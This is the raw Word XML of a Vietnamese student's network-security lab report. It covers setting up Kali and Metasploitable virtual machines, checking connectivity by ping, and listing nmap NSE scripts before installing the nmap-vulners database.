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BBB31" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhth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bookmarkStart w:id="0" w:name="_Hlk147479490"/>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9236A" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KHOA AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65306077" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/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F7DCBE0" wp14:editId="28031ED4">
            <wp:extent cx="2139952" cy="2139952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1224545928" name="Picture 3" descr="Học viện Công nghệ Bưu chính Viễn thông – Wikipedia tiếng Việ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9952" cy="21399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BF18F99" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E964E" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">MÔN HỌC: </w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>AN</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOÀN MẠNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979113E" w14:textId="66F4B425" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhth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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>BÁO CÁO THỰC HÀNH BÀI 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24974860" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC03DFA" w14:textId="0460904C" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C167504" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:ind w:firstLine="2127"/>
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2493E216" w14:textId="64D94A89" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:ind w:firstLine="2127"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giảng viên</w:t>
      </w:r>
      <w:r w:rsidR="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hướng dẫn</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hoàng</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xuân Dậu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58553258" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:ind w:firstLine="2127"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rStyle w:val="Phngmcinhcuaoanvn"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sinh viên: </w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hoàng Trung Kiên – B20DCAT098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57793754" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604C77CB" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709C7E42" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA4B02C" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F076E1C" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B18181D" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1661F89D" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478B5E0D" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A3E958" w14:textId="77777777" w:rsidR="00581828" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0CB376" w14:textId="4A324B67" w:rsidR="00DD49D8" w:rsidRPr="000739B5" w:rsidRDefault="00581828" w:rsidP="000739B5">
      <w:pPr>
        <w:pStyle w:val="Binhthng"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/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Hà Nội – 11/2023</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7E9D59C8" w14:textId="1F52F1A3" w:rsidR="00D66EB4" w:rsidRPr="000739B5" w:rsidRDefault="00581828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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Đổi</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tên </w:t>
      </w:r>
      <w:r w:rsidR="00B2194F" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE45C68" w14:textId="6109FB66" w:rsidR="00E13122" w:rsidRPr="000739B5" w:rsidRDefault="00E13122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Máy Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784790F4" w14:textId="61083E55" w:rsidR="00E13122" w:rsidRPr="000739B5" w:rsidRDefault="00B2194F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61D2FA7" wp14:editId="7332F251">
            <wp:extent cx="5731510" cy="2113915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="135505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525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736E" w14:textId="0FE02848" w:rsidR="00DD49D8" w:rsidRPr="000739B5" w:rsidRDefault="00DD49D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575F945" wp14:editId="21884613">
            <wp:extent cx="5731510" cy="406400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="123811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135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1820" w14:textId="5A50FCE0" w:rsidR="00E305BA" w:rsidRPr="000739B5" w:rsidRDefault="00E305BA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Máy Meta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148172D5" w14:textId="08D1F780" w:rsidR="00B2194F" w:rsidRPr="000739B5" w:rsidRDefault="00E305BA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FA0034F" wp14:editId="135A07EF">
            <wp:extent cx="5731510" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="169649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95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5B94" w14:textId="5A47C0B8" w:rsidR="00DD49D8" w:rsidRPr="000739B5" w:rsidRDefault="00DD49D8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DB939F3" wp14:editId="40111AE2">
            <wp:extent cx="5731510" cy="412750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="144271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11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E61C" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630DE7E7" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2D889B" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C446D68" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACE77EB" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F776A2" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D00D91D" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCAC6D8" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A2DD30" w14:textId="349615B0" w:rsidR="00B2194F" w:rsidRPr="000739B5" w:rsidRDefault="00B2194F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 xml:space="preserve">Địa chỉ IP máy </w:t>
      </w:r>
      <w:r w:rsidR="00DE42ED" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Meta: 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A199748" w14:textId="005CCC1C" w:rsidR="00B2194F" w:rsidRPr="000739B5" w:rsidRDefault="00B2194F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30F0BB1" wp14:editId="5CC7FDEE">
            <wp:extent cx="5731510" cy="3253740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="103950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02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367A" w14:textId="35E15286" w:rsidR="003F5B31" w:rsidRPr="000739B5" w:rsidRDefault="003F5B31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 xml:space="preserve">Địa chỉ IP máy </w:t>
      </w:r>
      <w:r w:rsidR="00DE42ED" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kali: 192.168.100.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E1ED6" w14:textId="7A10916F" w:rsidR="0025070A" w:rsidRPr="000739B5" w:rsidRDefault="003F5B31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9CBA697" wp14:editId="13E10D0D">
            <wp:extent cx="5731510" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="157727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72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3735" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21373403" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073A4C78" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2ACD8E" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB5B2CE" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E542E0B" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFFB18E" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09515A5F" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB2EDF9" w14:textId="77777777" w:rsidR="00405F4A" w:rsidRPr="000739B5" w:rsidRDefault="00405F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A3DB6B" w14:textId="1104A823" w:rsidR="00C146CF" w:rsidRPr="000739B5" w:rsidRDefault="00C146CF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Ping từ máy Kali đến máy Meta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC98A2" w14:textId="43EF6627" w:rsidR="00C146CF" w:rsidRPr="000739B5" w:rsidRDefault="00C146CF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22EBAE9" wp14:editId="7646A93C">
            <wp:extent cx="5731510" cy="2542540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="136055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51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AC01" w14:textId="022D3C06" w:rsidR="0025070A" w:rsidRPr="000739B5" w:rsidRDefault="0025070A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Ping từ máy Meta đến máy Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605C9C2" w14:textId="3D60708E" w:rsidR="00DD49D8" w:rsidRPr="000739B5" w:rsidRDefault="0025070A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CD98FF3" wp14:editId="0D56397E">
            <wp:extent cx="5731510" cy="1772920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195609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98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BE2A" w14:textId="6F3D9E71" w:rsidR="00DD49D8" w:rsidRPr="000739B5" w:rsidRDefault="00DD49D8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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00405F4A" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra và cài đặt các NSE scripts cho nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34754B5B" w14:textId="154C8CE2" w:rsidR="001146D7" w:rsidRPr="000739B5" w:rsidRDefault="001146D7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Kiểm tra các NSE scripts có sẵn cho nmap: cd /usr/share/nmap/scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBB512" w14:textId="7DD3DEA4" w:rsidR="003C0C3F" w:rsidRPr="000739B5" w:rsidRDefault="003C0C3F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441123E7" wp14:editId="717A9B6F">
            <wp:extent cx="5731510" cy="3397250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="683145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456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7A5A" w14:textId="77777777" w:rsidR="003C0C3F" w:rsidRPr="000739B5" w:rsidRDefault="003C0C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67930013" w14:textId="01B3F26E" w:rsidR="003C0C3F" w:rsidRPr="000739B5" w:rsidRDefault="003C0C3F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Cài đặt CSDL nmap-vulners</w:t>
      </w:r>
    </w:p>
